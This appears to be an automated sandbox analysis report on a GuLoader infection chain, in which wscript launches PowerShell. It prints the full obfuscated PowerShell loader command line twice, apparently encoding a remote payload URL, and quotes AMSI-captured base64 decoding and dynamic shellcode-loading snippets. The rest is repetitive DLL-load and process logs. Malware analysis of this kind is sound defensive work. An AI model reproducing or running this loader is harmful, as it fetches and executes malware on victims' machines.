          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2565274087.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb5 source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .Core.pdb source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL", ""Get-Service;$Thickskulled='func';Get-H", "", "", "0");
          Yara detected GuLoader
          Source: Yara matchFile source: 00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Poethood)$glObAl:OVeRNErvouSLY = [sYSTeM.TeXT.EnCodING]::ascII.GEtstRiNG($suMpEgN)$globaL:tJstaTivErnEs=$oVERNervOUslY.SubStrIng($PiTaRAH,$aKAdEmikERaRbeJdSLShEd)<#uptide Bogreols Vv
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Afvbning $Relieffets $Tracerteknikkens), (Semidestructive @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Dispensernes = [AppDomain]::CurrentDomain.GetAsse
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Uncherishing)), $Mondnitetens).DefineDynamicModule($Pathology, $false).DefineType($Mammilliform, $Opgavetyper, [System.MulticastDelega
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Poethood)$glObAl:OVeRNErvouSLY = [sYSTeM.TeXT.EnCodING]::ascII.GEtstRiNG($suMpEgN)$globaL:tJstaTivErnEs=$oVERNervOUslY.SubStrIng($PiTaRAH,$aKAdEmikERaRbeJdSLShEd)<#uptide Bogreols Vv
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
